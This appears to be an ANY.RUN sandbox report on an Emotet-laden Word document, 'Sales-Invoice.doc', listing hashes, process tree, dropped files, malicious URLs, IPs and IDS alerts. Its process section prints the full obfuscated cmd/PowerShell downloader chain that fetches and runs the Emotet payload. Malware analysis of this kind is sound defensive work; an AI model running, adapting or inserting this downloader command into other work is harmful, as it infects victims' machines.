analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
download:

Sales-Invoice

Full analysis: https://app.any.run/tasks/d4071fcb-09a4-405e-ad4c-d0ad7dc1f1d9
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: November 08, 2018, 16:18:28
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
trojan
loader
emotet
maldoc-4
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Author: Colin-PC, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Thu Nov 8 15:35:00 2018, Last Saved Time/Date: Thu Nov 8 15:35:00 2018, Number of Pages: 1, Number of Words: 2, Number of Characters: 13, Security: 0
MD5:

BD3E15AA275CDB2445DE44AD4BF10DDC

SHA1:

9B12DB4A1AC0C7FF62604C551F4F7EE5C34137BF

SHA256:

AE22C46A9820503B56EB7548A78668013B7CA456DC5015BFCA4226E9EAC557AD

SSDEEP:

768:TbqUAyVucRFoqkp59YBvLdTv9ReVi4eFov5UHRFBt+1o9y889/+/9Msl:TmUAyocn1kp59gxBK85fBt+a9/

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Starts CMD.EXE for commands execution

      • WINWORD.EXE (PID: 3360)
    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 3360)
    • Application was dropped or rewritten from another process

      • 266.exe (PID: 3712)
      • 266.exe (PID: 3916)
      • lpiograd.exe (PID: 3260)
      • lpiograd.exe (PID: 3996)
    • Downloads executable files from the Internet

      • powershell.exe (PID: 884)
    • Emotet process was detected

      • lpiograd.exe (PID: 3260)
  • SUSPICIOUS

    • Creates files in the user directory

      • powershell.exe (PID: 884)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 884)
      • 266.exe (PID: 3712)
    • Executes PowerShell scripts

      • CMD.exe (PID: 1152)
    • Application launched itself

      • 266.exe (PID: 3916)
    • Starts itself from another location

      • 266.exe (PID: 3712)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 3360)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3360)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

CompObjUserType: Microsoft Word 97-2003 Document
CompObjUserTypeLen: 32
HeadingPairs:
  • Title
  • 1
TitleOfParts: -
HyperlinksChanged: No
SharedDoc: No
LinksUpToDate: No
ScaleCrop: No
AppVersion: 16
CharCountWithSpaces: 14
Paragraphs: 1
Lines: 1
Company: -
CodePage: Windows Latin 1 (Western European)
Security: None
Characters: 13
Words: 2
Pages: 1
ModifyDate: 2018:11:08 15:35:00
CreateDate: 2018:11:08 15:35:00
TotalEditTime: -
Software: Microsoft Office Word
RevisionNumber: 1
LastModifiedBy: -
Template: Normal.dotm
Comments: -
Keywords: -
Author: Colin-PC
Subject: -
Title: -
No data.
screenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
38
Monitored processes
7
Malicious processes
5
Suspicious processes
1

Behavior graph

Click at the process to see the details
start drop and start drop and start winword.exe no specs cmd.exe no specs powershell.exe 266.exe no specs 266.exe #EMOTET lpiograd.exe no specs lpiograd.exe

Process information

PID
CMD
Path
Indicators
Parent process
3360"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Sales-Invoice.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
1152CMD cmD.Exe /c "sET jflB= (new-object sYsTeM.IO.COMpREsSiOn.dEfLATeStrEAM([SySTEM.iO.mEmorySTrEAM][ConveRT]::FroMBaSe64sTriNg( 'TZBdTwIxEEX/yj40KQTpJj7wQLMJBkXxA0JMNBhfZrcDW9vOrGzZVQn/XSCS+Drn3pPcERU0GWHb5/wDi5jMMKpXzMfeIkUtbqePmSxjrIZpWpVgA1BpgJjWquCQFnfon0Z/PIcI3jOpzTat7cxMxmfStq3C/g9zUIFzm75t7/FmeaYG62gJamu2ZOHkbRdL979sbO04WFqxghpKIAe5WrOyJnVuOcf1lVTPlbexI0eyq8XnvEmyRF4OBlKLh+AzgdQMI4aqJ99l78h7UuEXSr3iDUJRdsRi9ZJYSo6Tu7u4+d6Jw2vUNbfkGczEejxlLpKjsKun1LDD/vQgPV10fvA4vS8gFuVuv/8F'),[iO.cOmpreSSioN.COmprESsIonMode]::DEcOMPrEss ) ^| FOREACh-oBJect{ new-object SyStEm.iO.sTreaMReADEr( $_ , [tExT.eNcODinG]::AsCii )} ).ReadToEND( )^|^&( $SHELlid[1]+$sHelLiD[13]+'X')&&powerSHEll Sv ( \"bN\" + \"w\") ( [tyPE]( \"{0}{1}{2}\"-f'e','nv','IROnMenT') ) ; ${exeCu`TI`o`NConTExT}.\"Invo`keC`om`m`And\".\"InV`OK`e`SCRIpt\"( ( ( GET-CHiLDiTEm ( 'var' + 'iaB'+'lE:bNW') ).vAlUe::( \"{2}{4}{1}{3}{0}\"-f 'abLE','nTVA','GetENVirONM','rI','E' ).Invoke( (\"{1}{0}\"-f 'Lb','JF' ),( \"{1}{0}{2}\"-f 'roC','p','eSs') ) ) )" C:\Windows\system32\CMD.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
884powerSHEll Sv ( \"bN\" + \"w\") ( [tyPE]( \"{0}{1}{2}\"-f'e','nv','IROnMenT') ) ; ${exeCu`TI`o`NConTExT}.\"Invo`keC`om`m`And\".\"InV`OK`e`SCRIpt\"( ( ( GET-CHiLDiTEm ( 'var' + 'iaB'+'lE:bNW') ).vAlUe::( \"{2}{4}{1}{3}{0}\"-f 'abLE','nTVA','GetENVirONM','rI','E' ).Invoke( (\"{1}{0}\"-f 'Lb','JF' ),( \"{1}{0}{2}\"-f 'roC','p','eSs') ) ) )C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
CMD.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3916"C:\Users\admin\AppData\Local\Temp\266.exe" C:\Users\admin\AppData\Local\Temp\266.exepowershell.exe
User:
admin
Company:
AbanSoft / Sun Microsystems, Inc.
Integrity Level:
MEDIUM
Description:
Window I Stub
Exit code:
0
Version:
1, 4, 2, 50
3712"C:\Users\admin\AppData\Local\Temp\266.exe"C:\Users\admin\AppData\Local\Temp\266.exe
266.exe
User:
admin
Company:
AbanSoft / Sun Microsystems, Inc.
Integrity Level:
MEDIUM
Description:
Window I Stub
Exit code:
0
Version:
1, 4, 2, 50
3260"C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe"C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe
266.exe
User:
admin
Company:
AbanSoft / Sun Microsystems, Inc.
Integrity Level:
MEDIUM
Description:
Window I Stub
Exit code:
0
Version:
1, 4, 2, 50
3996"C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe"C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe
lpiograd.exe
User:
admin
Company:
AbanSoft / Sun Microsystems, Inc.
Integrity Level:
MEDIUM
Description:
Window I Stub
Version:
1, 4, 2, 50
Total events
1 677
Read events
1 264
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
2
Text files
0
Unknown types
2

Dropped files

PID
Process
Filename
Type
3360WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR9F49.tmp.cvr
MD5:
SHA256:
884powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\Y6ZRYSAOBJHXF31UXXTK.temp
MD5:
SHA256:
884powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF5daae1.TMPbinary
MD5:3C6A7AAE234382390B6B52F47ECA1BAA
SHA256:C8D6BF40DC644B318B2D69E1A1CD3EC9CCFDED8ADE326D33CFAA2C4E3187FCD2
3712266.exeC:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exeexecutable
MD5:82F7A4BB3C787D75EF9E848436C41792
SHA256:1175BE83C70C2F140571429D35B3FC2F4A8C755F5A101EC63DD30094E2B5C46E
3360WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:87B95D0ECE82EBD50633743922231E2D
SHA256:98008248E1672A8FE72F1E9FC9129295BD111188F4DDEF79B76672002BEE9FEC
884powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:3C6A7AAE234382390B6B52F47ECA1BAA
SHA256:C8D6BF40DC644B318B2D69E1A1CD3EC9CCFDED8ADE326D33CFAA2C4E3187FCD2
884powershell.exeC:\Users\admin\AppData\Local\Temp\266.exeexecutable
MD5:82F7A4BB3C787D75EF9E848436C41792
SHA256:1175BE83C70C2F140571429D35B3FC2F4A8C755F5A101EC63DD30094E2B5C46E
3360WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$les-Invoice.docpgc
MD5:C8ADEA8DE89060A23E3BD9454D5980C4
SHA256:84F77475E4B95855C959FA24FF86B26B76F566385AA323485DB099C1175A97EE
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
3
TCP/UDP connections
2
DNS requests
1
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
884
powershell.exe
GET
200
103.255.237.191:80
http://phaimanhdanong.com/cHelM/
VN
executable
148 Kb
malicious
3996
lpiograd.exe
GET
173.34.90.245:443
http://173.34.90.245:443/
CA
malicious
884
powershell.exe
GET
301
103.255.237.191:80
http://phaimanhdanong.com/cHelM
VN
html
617 b
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
884
powershell.exe
103.255.237.191:80
phaimanhdanong.com
VNPT Corp
VN
malicious
3996
lpiograd.exe
173.34.90.245:443
Rogers Cable Communications Inc.
CA
malicious

DNS requests

Domain
IP
Reputation
phaimanhdanong.com
  • 103.255.237.191
malicious

Threats

PID
Process
Class
Message
884
powershell.exe
A Network Trojan was detected
SC TROJAN_DOWNLOADER Generic Trojan Emotet downloader
884
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
884
powershell.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
884
powershell.exe
Misc activity
ET INFO EXE - Served Attached HTTP
No debug info